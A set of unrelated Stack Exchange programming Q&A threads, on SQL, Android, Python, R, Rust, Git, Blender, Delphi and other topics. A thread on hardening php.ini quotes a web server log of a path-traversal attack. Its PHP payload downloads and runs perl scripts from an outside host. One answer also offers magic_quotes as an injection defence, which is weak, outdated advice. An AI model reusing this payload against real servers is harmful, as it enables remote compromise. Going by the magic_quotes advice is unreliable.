@PeteBecker Yes, like reserve one insert earlier than the standard vector would.
common-pile/stackexchange_filtered
How to show results of DDL statement (like Oracle does) in SQL Server Management Studio? Is there a way to show the results of DDL statements such as CREATE/ALTER; after they are "run" in the query window? By default it just shows "command(s) completed". Is there a way to see something similar to the results Oracle shows from the same commands? "command(s) completed" after a create table command is very similar to 'table created' oracle sql*plus message. If you need a desc my_table you can execute sp_help my_table Thanks, that's what I'll use. Appreciate the quick response. You can also use sp_helptext my_sp for describe stored procedure, function, or view
common-pile/stackexchange_filtered
17.10 seahorse-nautilus mime association for "decrypt file", getting really frustrated at the ubuntu way I'm a proficient linux user, just recently I've been learning how to deploy server with ansible+vagrant so I just spent an entire week on centOS and various other flavour of linux getting a complex network to work. I require to encrypt decrypt from nautilus context menu, I installed seahorse-nautilus and everything went fine, I created a key and everything is working, then I accidentally opened a .pgp file with textedit selecting open with from nautilus and this changed the mime association. I cant't figure where does ubuntu actually stores mime association and I can't even find anymore decent documentation and specs about everything that ubuntu does its own way. can't find where it changed it now, looked at all the usual places for mime associations and couldn't find the added association between pgp and textedit. I uninstalled seahorse-nautilus and reinstalled it (including a nautilus -q) but no luck, the text edit mime association stays. can somebody please explain to me where does ubuntu adds mime association made with nautilus when you click open with application and how to either prevent that from happening or change it afterwards? I'm getting really frustrated at ubuntu in recent years, seems like it's not even linux anymore and this might really be the last drop, might go to real linux like arch in the next couple days and forget this bloatware that ubuntu has become. I checked /usr/share/applpications/ etc. etc. $HOME/.local/share/ etc. /usr/share/gdm/greeter etc. found many different config file holding mime association but nothing regarding pgp. please help Possible duplicate of Where are file associations stored? Did you check ~/.config/mimeapps.lst ? You don't have sufficient rep to post a comment. With more details you can change this comment in the form of an answer, into a real answer though.
common-pile/stackexchange_filtered
How to set slidingpanel default state collapse and collapse panel min height? I am using sliding panel foursquare library and as i open the panel activity i found panel to be expanded by default but i wan to set it to be collapse by default so please tell me how to do that? As i slide down the panel or collapse it sliding layout get of 40 DP in height but i want it to be of 100 DP minimum. So please tell me how and where to make changes to have these two things in my app? what i have tried so far is that changed attributes these field in the sliding panel widget but none of them is working for me collapseMap(); slidingUpPanelLayout.hidePane() slidingUpPanelLayout.collapsePane(); app:paralaxOffset="@dimen/paralax_offset" app:shadowHeight="0dp" app:dragView="@+id/sliding_container" app:panelHeight="40dp" Where did you set the states; inside onCreate()? Maybe you can read the wiki at the original SlidingUpPanelLayout from Umano https://github.com/umano/AndroidSlidingUpPanel @eee i have resolved my one problem regarding setting sliding panel layout to be collapsed by default but please tell me how to change the height of the collapsed panel sliding panel foursquare library is actually implementing this library:https://github.com/umano/AndroidSlidingUpPanel and i have used this AndroidSlidingUpPanel library and for this I used mSlideLayout.setPanelState(SlidingUpPanelLayout.PanelState.COLLAPSED); So i hope this code will help you. i have resolved this issue thanx for your revert but can you please help me out from my second issue which i regarding collapsed panel height I had used like this: <com.sothree.slidinguppanel.SlidingUpPanelLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:sothree="http://schemas.android.com/apk/res-auto" android:background="@color/hk_white" android:gravity="bottom" sothree:umanoDragView="@+id/dragView" sothree:umanoOverlay="true" sothree:umanoPanelHeight="@dimen/Size_100" sothree:umanoParalaxOffset="100dp" sothree:umanoShadowHeight="0dp"> i did but any of these didn't work for me, i have mentioned attributes above on question which i have chaned so use sothree instead of app to change pannel height in xml see my code id don't think it will make any difference because i have entered app in xmnls attributie o XML You can set the default state from the layout xml file itself. Add the below attributes to the com.sothree.slidinguppanel.SlidingUpPanelLayout app:umanoInitialState="collapsed" For collapsed panel height app:umanoPanelHeight="100dp"
common-pile/stackexchange_filtered
HTTP Error when using urllib.request I am trying to do a profanity check test. The code I have written so far is import urllib.request def read_text (): file = open (r"C:\Users\Kashif\Downloads\abc.txt") file_print = file.read () print (file_print) file.close () check_profanity (file_print) def check_profanity (file_print): connection = urllib.request.urlopen ("http://www.purgomalum.com/service/containsprofanity?text="+file_print) output = connection.read () print ("The Output is "+output) connection.close () read_text () But I get the error below urllib.error.HTTPError: HTTP Error 400: Bad Request I don't know what I am going wrong. I am using Python 3.6.1 you should include the stack trace from the error. Please also include the contents of abc. Probably there is some issues in the file itself. The HTTP error you're getting is usually a sign of something bad in the way you are requesting data to the server. According to the HTTP Spec: 400 Bad Request The request could not be understood by the server due to malformed syntax. The client SHOULD NOT repeat the request without modifications In concrete in your example, the problem seems to be with the lack of URL encoding of the data you're sending in the URL. You should try using the method quote_plus from the urllib.parse module to make your request acceptable: from urllib.parse import quote_plus ... encoded_file_print = quote_plus(file_print) url = "http://www.purgomalum.com/service/containsprofanity?text=" + encoded_file_print connection = urllib.request.urlopen(url) If that doesn't work then the problem might be with the contents of your file. You can try it first with a simple example, to verify your script works and then try using the file's content afterwards. Apart from the above, there's also a couple of other issues with your code: No spaces needed between methods and brackets: file.close () or def read_text (): and so on. Decode the content after reading it to convert bytes to a string: output = connection.read().decode('utf-8') The way you're calling the methods creates a circular dependency. read_text calls check_profanity that in the end calls read_text that calls check_profanity, etc. Remove the extra method calls and just use return to return the output of a method: content = read_text() has_profanity = check_profanity(content) print("has profanity? %s" % has_profanity) Thanks for helping me out, it works perfectly. I just have another question. I have seen this same program working perfectly in python 2.7. Are the changes you mentioned due to the change in version? I am completely beginner therefore I don't know much Hm I don't think so. The changes I made with using quote_plus were necessary for the request to be correctly sent to the server. I don't see how this could work differently on Python 2.7. If you have that code around send it and I can try it out
common-pile/stackexchange_filtered
Little particles appearing on render When I render preview my animation little twinkling particles appear. I might have turned them on but since I'm new to Blender I don't know how to turn it off. @Jaspa I'm sure that cycles did finish rendering. In fact, this was just a preview of a render (if that changes anything?). I'm posting another screenshot of a different position of my animation and there's no little dots to see on buildings, except on the building from a first screenshot in the distance. You're sure that cycles didn't just not finished rendering yet completely? Maybe there were also too few render steps set, so he didn't finish. several related information here for instance http://blender.stackexchange.com/questions/4980/how-to-avoid-noisy-renders-in-cycles @Jaspa I'm sure that cycles did finish rendering. In fact, this was just a preview of a render (if that changes anything?). I'm posting another screenshot of a different position of my animation and there's no little dots to see on buildings, except on the building from a first screenshot in the distance. What are you lighting the screen with? Are you using a lamp or an HDR environment map? (My answer could be updated a little bit to suggest multiple importance if using an environment map) Possible duplicate: http://blender.stackexchange.com/q/1703/599 The "little particles" are often referenced as "fireflies". In this case, the reason they show in one scene but not the other is because of the light bouncing from the reflective surface, which is less even in brightness than diffuse surface. Increasing samples can help, but it's usually not the right approach. There are a few things that can help: Set a value for Clamp Indirect so somewhere around 2 +/- 1.5 - this limits the influence indirect lighting will have on your scene. Maybe even less than 0.5 in this case. Try "Direct Light" (cleanest images but flat looking) or "Limited Global Illumination" Be sure "Reflective Caustics" is disabled Try lowering the number of Glossy bounces to 1 As Jaspa mentioned you should go to render tab, then go to sampling and increase the render samples to something like 1000 (the more the higher the image quality) then hit render (this option is in the render tab)
common-pile/stackexchange_filtered
Git bringing all commits from one repo to another At work we had a GIT repository let's call it OriginalRepo with many folders. There was made a decision to provide to another team a new repository (Let's call NewRepo) with a few folders from OriginalRepo. The folder structure is the same in both repositories, the only difference is that NewRepo has a subset of folders. Another team has made 200+ commits with a few branches. What we want is to bring all branches with all commits from NewRepo into OriginalRepo to the commit from which they diverged. I would like all branches which were created in NewRepo to be called in OriginalRepo "NewRepo_" + NewRepoBranchName all commits I would like have same authors & dates. Is it possible to create a script doing that? I guess simplest way to do this would be to do (in OriginalRepo): git remote add NewRepo <url-to-new-repo> git fetch NewRepo Now all remote refs will be stored in .git/refs/remotes/NewRepo. In other words, you could do: git checkout NewRepo/NewRepoBranchName I think that should be enough. If you want to create local branches corresponding to each remote branch in NewRepo, you could use a for loop like this: #/bin/bash for REMOTE_BRANCH in $(git branch -r | grep -o "[^ ]*" | grep "^NewRepo") #Loop through all remote branches from NewRepo do BRANCH=$(echo $REMOTE_BRANCH | grep -o -P "(?<=^NewRepo/).*") #Remove the NewRepo/ prefix LOCAL_BRANCH=NewRepo_$BRANCH #Add NewRep_ prefix git branch $LOCAL_BRANCH $REMOTE_BRANCH #Create local branch corresponding to the remote branch done Alderath, many thanks for the provided solution. Actually I wanted to have branches with all commits. I have found cherry-pick is very good. git cherry-pick sha1..shaN
common-pile/stackexchange_filtered
iOS - If passed the bottom of the screen I created a simple app that fall down an image, that's great but my problem is when it fall down it's not repeating after searching I found a to repeat it, but I want to know how to check if the image is at the bottom of the screen repeat falling. here is my code in .h file @interface ViewController : UIViewController { NSTimer *moveit; IBOutlet UIImageView *img; } in .m file -(void)viewDidLoad{ moveit = [NSTimer scheduledTimerWithTimeInterval:0.005 target:self selector:@selector(fallThei) userInfo:nil repeats:YES]; } -(void)fallThei{ img.center = CGPointMake(img.center.x, img.center.y +9); } and the repeat code is img.center = CGPointMake(img.center.x, -img.frame.size.height + img.frame.size.height/2); So how to check if the image at the bottom then do something? Thanks in advance. you never do any checks to see if it is at the bottom of your screen. put some checking such as if (img.frame.origin.x == ...) -(void)fallThei { if (img.center.y >= [[[UIScreen mainScreen]bounds]size].height) { img.center = CGPointMake(img.center.x,0); } else { img.center = CGPointMake(img.center.x,img.center.y + 9); } I tried this code it shows me an error "No member named 'height' in 'struct CGRect'" Thank you!! That helped me and after searching I found the way to fix that problem here is the way I fixed that error CGRect screenBound = [[UIScreen mainScreen] bounds]; CGSize screenSize = screenBound.size; CGFloat screenHeight = screenSize.height; if (down.center.y >= screenHeight) { down.center = CGPointMake(down.center.x,0); } else { down.center = CGPointMake(down.center.x,down.center.y + 9); } Add test in fallThei: if(img.center.y + 9 >= screen_height + img.frame.size.height/2) { img.center = CGPointMake(img.center.x, -img.frame.size.height/2); } Thanks! But is there is anyway to know the screen height automatic? Yes, with [[UIScreen mainScreen]bounds].height
common-pile/stackexchange_filtered
How do i plot a timeseries graph with the following data i have datehashtag_count = testing2.groupby(pd.Grouper(key='date', freq='M'))['hashtags'].value_counts() print(datehashtag_count) date hashtags 2021-01-31 ['gme' 16322 ['gme'] 13691 ['amc' 4762 ['robinhood' 1723 ['wallstreetbets' 1690 ... 2021-12-31 ['wallstreet' 1 ['wearethestockmarket' 1 ['whatdoyoubelieveln' 1 ['xela' 1 ['zom' 1 Name: hashtags, Length: 7106, dtype: int64 How do i plot a timeseries graph with the following values i got, using the column 'date' , 'hashtags' and the hashtags count. Try something like this ? import seaborn as sns import matplotlib.pyplot as plt datehashtag_count = testing2.groupby(pd.Grouper(key='date', freq='M'))['hashtags'].value_counts() print(datehashtag_count) datehastag_count = datehashtag_count.reset_index() datehashtag_count.set_axis(['date', 'hashtag' , 'count' ], axis = 1 ) plt.figure() sns.lineplot(x = 'date', y='count', hue='hastag', data=datehashtag_count) plt.show() Haven't tested the code. Don't have an equivalent dataset to work on, but this should work. Hi thanks for the answer. I tried and got this error "TypeError: Cannot reset_index inplace on a Series to create a DataFrame" Yes, thats expected. Sorry, I didn't realize the value_counts returns a series. Have edited the code. Please try the same Hi thanks for replying. I tried and got this error "ValueError: cannot insert hashtags, already exists" and the error was pointing to this line of code "datehastag_count = datehashtag_count.reset_index()"
common-pile/stackexchange_filtered
Configuring php.ini to prevent attacks I have been attacked on a shared host server (heartinternet) and they said I should configure my own php.ini file properly. Well I have a little php/MySQL program with a registering function, a little admin site however someone hacked it. What is the general way to configure a php.ini file to be able to prevent attack like this? Any good setting would be really appreciated. Here is what I got from the webhost provider: <IP_ADDRESS> - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "<?php echo \"j13mb0t#\"; passthru('wget http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http ://some . thesome . com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget http ://some . thesome . com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>" Because script injection attacks the site code itself, it is able to completely avoid webserver security. Unfortunately, some content management systems (especially older versions of Joomla) are extremely susceptible to this form of attack. A simple way to remove the ability for attackers to use this method is to add a php.ini file at the top-level of the website with the following contents - be aware though that the web-site will need testing afterwards to ensure that no legitimate web-site scripted actions have been affected by the change: The php.ini directives are... allow_url_include = "0" allow_url_fopen = "0" It's not clear that either of those directives would have blocked this attack. The way that attack worked was not by include()ing or fopen()ing a remote URL, it relied on being able to trick your code into include()ing /proc/self/environ which is a file containing the process's environment variables. The request poisoned those environment variables with the actual exploit code, and the actual exploit downloaded and executed a perl script that did the dirty work. Establishing an open_basedir setting that allows your code to only open files in specific directories would have blocked this attack, but in general, programs that execute scripts based on user input without very rigorous controls have dozens of ways to be attacked, especially if they allow user-uploaded content like pictures or whatever. Keeping your site code up-to-date is important too. Especially since this exploit has been known to affect Joomla since at least last March Thanks your kind answer, could you give ma an example how to do that as I am a beginner on this side. Thanks again when can also prevent by using magic_quotes_gpc = On and magic_quotes_runtime = On in your php.ini . due to this automatically escape all ' (single-quote), " (double quote), \ (backslash) and NUL's with a backslash for GET, POST and cookies sent. i do not get it It seems php7 doesn't has this option in php.ini, or should I change somewhere else? If you are asking how to prevent exactly this attack, what you need to disable is the passthru function in php.ini. If you are privileged to load your custom php.ini, you can disable some dangerous php functions such as exec (unless your script need it) by putting the appropriate functions in the php disable functions list. disable_functions=passthru,exec,phpinfo There is no specific set of disable function which you can use here(if there are, then php devs would have never included it in php :)). It all depends on the php functions you use and don't use. So, refer the php manual, and add any system command/function invoking php functions which are not used in your site script to the disable_functions list. Additionally, ask your host to install & configure mod_security which will not only protect your domain but everyone else in the shared environment. mod_security is a wonderful web application firewall which will help you protect the sites from a number of web attacks including html injection, sql injection, XSS attacks..etc. As from the given attack details, the attacker is uploading the perl script to /tmp which is most likely a threat to the whole server and not only limited to your domain/account. Thanks a lot SparX really appreciate your detailed answer. Hi SparX unfortunately I can't my provider doesn't let me change it any other idea? thanks Hi Andras, what is your host not allowing to change ? Could you clarify. Thanks for the quickly one:) mod_security is not installed also passthru can not be changed by Heartinternet, unfortunately. Just ask your host to disable those php functions for your domain only (either via htaccess or using a custom php.ini depending on the current php handler). See here: http://blog.tenablesecurity.com/2009/08/configuration-auditing-phpini-to-help-prevent-web-application-attacks.html Read the entire page. point there, sorry updated. I want to configure my php.ini file as best as I can. Any help on that? See here: http://blog.tenablesecurity.com/2009/08/configuration-auditing-phpini-to-help-prevent-web-application-attacks.html Read the entire page. Again, please don't just link to outside resources. Provide some content here, perhaps a summary. See the "Provide Context..." paragraph of the How to Answer page (which you've already read, correct?).
common-pile/stackexchange_filtered
Only the original thread that created a view hierarchy can touch its views. When running animation I can't figure out what is wrong in here, looks like Timer is causing this issue but even if I remove Timer line completely it still crashing with error like thi "Only the original thread that created a view hierarchy can touch its views." Maybe you guys can suggest a different way to run animations inside of an activity to avoid this. Another interesting thing is that it runs perfectly fine on Android 12, but crashing on Android 7. Here is the code that sitting inside of Activity: private fun setAnimations() { fadeInErrorMessage.setAnimationListener(object : Animation.AnimationListener { override fun onAnimationStart(animation: Animation) { binding.mainErrorMessageContainer.visibility = View.VISIBLE } override fun onAnimationEnd(animation: Animation) { Timer("ErrorMessage", false).schedule(1500L) { binding.mainErrorMessageContainer.startAnimation(fadeOutErrorMessage) } } override fun onAnimationRepeat(animation: Animation) {} }) fadeOutErrorMessage.setAnimationListener(object : Animation.AnimationListener { override fun onAnimationStart(animation: Animation) {} override fun onAnimationEnd(animation: Animation) { binding.mainErrorMessageContainer.visibility = View.INVISIBLE errorMessageAnimationIsRunning = false } override fun onAnimationRepeat(animation: Animation) {} }) } Here is logs: 2022-09-14 21:24:22.981 17059-17371/com.company.app E/AndroidRuntime: FATAL EXCEPTION: ErrorMessage Process: com.company.app, PID: 17059 android.view.ViewRootImpl$CalledFromWrongThreadException: Only the original thread that created a view hierarchy can touch its views. at android.view.ViewRootImpl.checkThread(ViewRootImpl.java:6892) at android.view.ViewRootImpl.invalidateChildInParent(ViewRootImpl.java:1083) at android.view.ViewGroup.invalidateChild(ViewGroup.java:5205) at android.view.View.invalidateInternal(View.java:13657) at android.view.View.invalidate(View.java:13621) at android.view.View.startAnimation(View.java:20175) at com.company.app.ui.main.MainActivity$setAnimations$1$onAnimationEnd$$inlined$schedule$1.run(Timer.kt:149) at java.util.TimerThread.mainLoop(Timer.java:555) at java.util.TimerThread.run(Timer.java:505) Just run your animations inside runOnUiThread(): runOnUiThread(new Runnable() { void run() { binding.mainErrorMessageContainer.visibility = View.VISIBLE } }); runOnUiThread(new Runnable() { void run() { binding.mainErrorMessageContainer.startAnimation(fadeOutErrorMessage) } }); Edit: it looks like your specific error refers to the onAnimationEnd, where you're running Timer.schedule(). So you should try to make that method look like this: override fun onAnimationEnd(animation: Animation) { Timer("ErrorMessage", false).schedule(1500L) { runOnUiThread(new Runnable() { void run(){ binding.mainErrorMessageContainer.startAnimation(fadeOutErrorMessage) } }); } } I just put it this way and it still throws the same error, literally wrapped anything that was inside animation in runOnUiThread(new Runnable() {}) what's the actual line where you get that error? Also, to be clear, I don't know what you mean when you say that you "literally wrapped anything that was inside animation`. You should have only wrapped specific lines that actually require a UI thread, just like I posted in my answer Well yeah that's what I meant, lines that interacting with UI, not the whole method. And it does not give me a specific line, eveything that I am getting about this errors in logs I posted below the code The error line looks to be in onAnimationEnd, where you're running Timer.schedule(). I just want to make sure that your set up runOnUiThread runOnUiThread() inside Timer.schedule I forgot that I had multiple Activities with Timer that was causing this issue, I wrapped lines inside Timer in Runnable and it fixed the issue, thank you so much for your help! override fun onAnimationEnd(animation: Animation) { Timer("ErrorMessage", false).schedule(1500L) { binding.mainErrorMessageContainer.startAnimation(fadeOutErrorMessage) } } You can't do it on a timer like that. That causes it to happen on a different thread. Assuming you created the UI on the main thread, put the body of the timer (the binding.mainError part) inside a runOnUiThread block. If you created the UI on a different thread, you should probably fix that first. You can tell that its the endAnimation call that's causing the problem because it's the one calling startAnimation, and its the one that's in the stack trace.
common-pile/stackexchange_filtered
I want to use the cor() function but output says 'y' must be numeric. Problem is, it is numeric I've reading data from an xlsx file. My read code start off like this: ecommerce<-read.xlsx("C:\\Users\\Thomas Rhee\\Documents\\GGU\\GGU Fall 2018\\Tools for Business Analytics\\Final Project\\ecommerce.xlsx", sheet = "data", startRow = 1, colNames = TRUE, col = c(1,2,3,4,5,6,7,8)); attach(ecommerce) names(ecommerce) One of the columns is "price". It looks like this: price <chr> 329.98 324.83999999999997 324.83 350 308 310 I used the sapply to find out my 'price' column's class is character. I use the following code to convert it into numeric: ecommerce$price <- as.numeric(as.character(ecommerce$price)) I checked again and it worked. I tried typing the following and get this output: cor(rank, price) Error in cor(rank, price) : 'y' must be numeric I'm lost. I'm also a beginner at this, so I'm open to suggestions here. Please dumb it down for me. This is a good example why you should not use attach. d <- data.frame(x = 1:3) attach(d) x ## now available because of attach # [1] 1 2 3 d$x <- LETTERS[1:3] x ## however this still refers to the original values of d$x # [1] 1 2 3 d$x # [1] "A" "B" "C" That means, you changed your original data in the data frame, but in your cor(.) call you reference the original one (the one which was attached) So to solve your issue, drop the attach command and specify the columns directly (after you have transformed them to a numeric): cor(ecommerce$rank, ecommerce$price) Technically, you could re-attach ecommerce again, after you changed it, but because of these issues I would strongly dis-encourage you to use attach at all.
common-pile/stackexchange_filtered
turning list into dataframe column in R function I have a function of the (very simplified) form below. doThing <- function(df){ result <- c() #Sets up dataframe to store lists totals <- rowSums(df) #Creates rowsum list from df column result[1] <- totals #intended to make totals a column in result. does not work } How do I assign the list created in this function to a column in my result dataset? I've also tried the following use of the assign function, to no avail assign(result[1], totals) Thank you all! result <- data.frame() You could assign a row-wise sum as a new column to dataframe. doThing <- function(df){ transform(df, total= rowSums(df)) } doThing(mtcars) # mpg cyl disp hp drat wt qsec vs am gear carb total #Mazda RX4 21.0 6 160.0 110 3.90 2.62 16.5 0 1 4 4 329 #Mazda RX4 Wag 21.0 6 160.0 110 3.90 2.88 17.0 0 1 4 4 330 #Datsun 710 22.8 4 108.0 93 3.85 2.32 18.6 1 1 4 1 260 #Hornet 4 Drive 21.4 6 258.0 110 3.08 3.21 19.4 1 0 3 1 426 #Hornet Sportabout 18.7 8 360.0 175 3.15 3.44 17.0 0 0 3 2 590 #... #... We can use doThing <- function(df) { df[["total"]] <- rowSums(df) df } doThing(mtcars)
common-pile/stackexchange_filtered
Is storing a reference to a parent possible with Rust? I have the following struct: pub struct Scope<'parent> { entries: HashMap<String, Type>, parent: Option<&'parent mut Self>, } impl<'parent> Scope<'parent> { pub fn with_parent(parent: &'parent mut Self) -> Self { Scope { entries: HashMap::new(), parent: Some(parent), } } } ////////////////////////////////////////// fn analyze_expression<'input>( errors: &mut Vec<CodeError>, wrapping_scope: &mut Scope, expression: Loc<Expression<'input>>, ) -> Result<AnnotatedExpression<'input>, AnalyzingError> { // } When trying to construct it, I get this error: error[E0623]: lifetime mismatch --> garlicsem/src/lib.rs:74:44 | 66 | wrapping_scope: &mut Scope, | ---------- | | | these two types are declared with different lifetimes... ... 74 | let scope = Scope::with_parent(wrapping_scope); | ^^^^^^^^^^^^^^ ...but data from `wrapping_scope` flows into `wrapping_scope` here Is this kind of construction possible? If not, what is the best way to implement something like this? Should I be using Rc? When I add explicit lifetimes like @nullptr suggested, I get the following error: error[E0495]: cannot infer an appropriate lifetime for borrow expression due to conflicting requirements --> garlicsem/src/lib.rs:78:56 | 78 | .map(|e| analyze_statement(errors, &mut scope, e)) | ^^^^^^^^^^ | note: first, the lifetime cannot outlive the lifetime `'_` as defined on the body at 78:26... --> garlicsem/src/lib.rs:78:26 | 78 | .map(|e| analyze_statement(errors, &mut scope, e)) | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ note: ...so that closure can access `scope` --> garlicsem/src/lib.rs:78:56 | 78 | .map(|e| analyze_statement(errors, &mut scope, e)) | ^^^^^^^^^^ note: but, the lifetime must be valid for the lifetime `'a` as defined on the function body at 64:31... --> garlicsem/src/lib.rs:64:31 | 64 | fn analyze_expression<'input, 'a>( | ^^ note: ...so that the expression is assignable --> garlicsem/src/lib.rs:74:44 | 74 | let scope = Scope::with_parent(wrapping_scope); | ^^^^^^^^^^^^^^ = note: expected `&mut scope::Scope<'_>` found `&mut scope::Scope<'a>` I am pretty sure that this kind of data structure just isn't possible in safe rust without using Rc or unsafe. Therefore I am wondering what the best way to implement this would be. Can you post the Scope::with_parent function and also the initialization of wrapping_scope? My guess is that wrapping_scope on line 66 needs to have an explicit lifetime 'a. @nullptr i edited my question. also, I had tried using explicit lifetimes, but since Scope takes a generic lifetime parameter, I get another lifetime error because the lifetimes don't match iirc. does my solution fix your problem? @nullptr i edited my question to show what happened when i tried adding an explicit lifetime I've edited my answer with some example code that compiles @Ian Rehwinkel It's hard to answer your question because it doesn't include a [MRE]. We can't tell what crates (and their versions), types, traits, fields, etc. are present in the code. It would make it easier for us to help you if you try to reproduce your error on the Rust Playground if possible, otherwise in a brand new Cargo project, then [edit] your question to include the additional info. There are Rust-specific MRE tips you can use to reduce your original code for posting here. Thanks! In struct Scope<'parent>, Option<&'parent mut Self> is implicitly Option<&'parent mut Scope<'parent>>. Thus, the wrapping_scope: &mut Scope parameter in analyze_expression needs to be wrapping_scope: &'a mut Scope<'a> with a 'a lifetime added in the analyze_expression<'input, 'a> function. To be explicit, this code compiles: use std::collections::HashMap; struct Type; pub struct Scope<'parent> { entries: HashMap<String, Type>, parent: Option<&'parent mut Self>, } impl<'parent> Scope<'parent> { pub fn with_parent(parent: &'parent mut Self) -> Self { Scope { entries: HashMap::new(), parent: Some(parent), } } } fn analyze_expression<'a>(wrapping_scope: &'a mut Scope<'a>) { let scope = Scope::with_parent(wrapping_scope); for (string, _typ) in scope.entries.iter() { println!("{:?}", string); } } This solution worked wonderfully after I changed it to be immutable (turns out i didn't need mutability).
common-pile/stackexchange_filtered
Image being loaded before app main method is called I have an ipad app where I am seeing an image displaying briefly before the app starts (image is part of bundle). My guess is that this is some wrong wiring of a xib file, but even when I set a breakpoint at the beginning of the main method, the image still appears before this point is reached. Resetting the simulator does not help, and the scenario occurs on a device too. Mmmm is the image named Default.png ? I just don't see an other explanation for this problem ^^ By the way, I just don't use Interface Builder to avoid this kind of strange problems ^^ Thank - Yes, I just realized this, that it was the custom launch screen.
common-pile/stackexchange_filtered
Can PySpark work with numpy arrays? I tried to execute the following commands in a pyspark session: >>> a = [1,2,3,4,5,6,7,8,9,10] >>> da = sc.parallelize(a) >>> da.reduce(lambda a, b: a + b) It worked fine. I got the expected answer (which is 55). Now I try to do the same but using numpy arrays instead of Python lists: >>> import numpy >>> a = numpy.array([1,2,3,4,5,6,7,8,9,10]) >>> da = sc.parallelize(a) >>> da.reduce(lambda a, b: a + b) As a result I get a lot of errors. To be more specific, I see the following error several times in the error message: ImportError: No module named numpy.core.multiarray Is something not install not my cluster or pyspark is not able to work with numpy array on a fundamental level? It looks like a configuration (version mismatch?) problem otherwise should work just fine. it says here that numpy is supported: link It gives some info under the tab Python. I had similar issues. I did below and issue resolved: pip uninstall numpy pip install numpy pip install nose
common-pile/stackexchange_filtered
Shift invariant in wavelet I always hear that wavelet transform is not shift invariant, and that there are other types of wavelet, like stationary wavelet and double density dual-tree wavelet transform, that are shift invariant. Can anyone explain to me, what is the meaning of "shift invariant" . I'm voting to close this question as off-topic because it is about math rather than programming. dsp.stackexchange.com might be a better place for it. Shift Invariant (Time Invariant in Time Domain) means that given an input and its corresponding output, the output of the same input shifted will yield shifted output. Namely, if F is the Operator, then OutputImage(x, y) = F(InputImage(x, y)). If F is Shift Invariant, it means OutputImage(x - s1, y - s2) = F(InputImage(x - s1, y - s2)). In the Wavelet world the property of Shift Invariance is usually achieved by skipping the Decimation step.
common-pile/stackexchange_filtered
SQL Query works fine in SMS but not when executing from ORM, DateTime Conversion error I have the following query in C# using FluentData ORM. List<dynamic> results = Context().Sql(@"SELECT DISTINCT a.EnteredDate, bb.PK_EmployeeName, bb.EmployeeId, bb.EmployeeName, dd.PK_EquipmentName, dd.EquipmentId, dd.EquipmentName FROM dbo.PIT_Inspection a INNER JOIN dbo.PIT_EmployeeName bb ON a.FK_EmployeeName = bb.PK_EmployeeName INNER JOIN dbo.PIT_EquipmentName dd ON a.FK_EquipmentName = dd.PK_EquipmentName WHERE CAST(a.EnteredDate AS DATE) BETWEEN '@0' AND @1'", fromDate, toDate ).QueryMany<dynamic>(); The parameters fromDate and toDate are strings and come populated with the following: fromDate = "20150224" toDate = "20150227" The area that seems to give me problem is: WHERE CAST(a.EnteredDate AS DATE) BETWEEN '@0' AND '@1'", fromDate , toDate I'm receiving an error Conversion failed when converting date and/or time from character string The above line, a.EnteredDate is of type DateTime. The query I'm executing, if copied over to SQL Server Management Studio, it runs fine. I double checked that my parameter is indeed bringing in correct data, as string. Any idea on what causes this error? Get rid of the '' around @0 and @1. The orm will use a SqlParameter object to represent @0 and @1 and will automatically do that for you. That applies to all parameters like that, regardless of type. Secondly you have a typo in your query "'@0' AND @1'", you have a closing apostrophe after @1 but no opening apostrophe before @1. But you don't need the apostrophes at all. @Ryios Thank you, your first comment helped me fix the problem. Didn't know that it will automatically handle that for me. Note on your second comment - Look at my first code example, i do have an opening double quote. Either way, you should put this as answer for me to accept. It may help others. My second comment was refering to this line BETWEEN '@0' AND @1' where the apostrophe (not double quote) is missing from the start of @ 1' It's hard to see the apostrophes in my comment, they are crammed up next to the double quotes. Oh I see what you were referring to, it was correct on my code before I made the changes you recommended. I must've erased it by mistake when copying it over here. Most ORM's convert @ parameters into SqlParameter objects, which handle typing for you so you don't need to enclose your query variables in apostrophes to denote a string. So change '@0' AND @1' to @0 AND @1 This likely applies to FluentData, and definitely applies to PetaPoco, and EntityFramework.
common-pile/stackexchange_filtered
Delphi TExcelApplication and Windows Preview Pan I have a program that connects to an open Excel file via TExcelApplication and creates a worksheet. When I have the windows preview pane activated, then I "previewed" my workbook, then I opened the workbook, and launched my App, the program returns the following error: 'Error OLE 800A03EC' In the windows process, I have 2 instances of excel, one of which has as an argument: "Embedding" I think Delphi is trying to connect to the wrong instance. How to connect to the good? Here is the minimalist code that reproduces the problem: procedure TForm1.Button1Click( Sender : TObject ); var Excel : TExcelApplication; begin try Excel := TExcelApplication.Create( Self ); Excel.ConnectKind := ckRunningInstance; Excel.Connect; Excel.Workbooks.Add( xlWBATWorksheet, 0 ); except on E : Exception do begin ShowMessage( E.Message ); end; end; end; end. Pictures to better understand what I'm talking about: Thank you in advance. Tristan What is xlWBATWorksheet? It's just an enum to create a WorkSheet : https://msdn.microsoft.com/fr-fr/library/microsoft.office.interop.excel.workbooks.add.aspx This code is fully functionnal without Windows Preview Pan Oh apologies, I thought it was some variable or constant of your own. Seems the ole error you are getting is similar to this post --> https://stackoverflow.com/questions/2355998/ole-800a03ec-error-when-using-texcelworkbook-saveas-method-in-delphi-7 We have the same error, but it's not the same problem : without the preview pane all is functional
common-pile/stackexchange_filtered
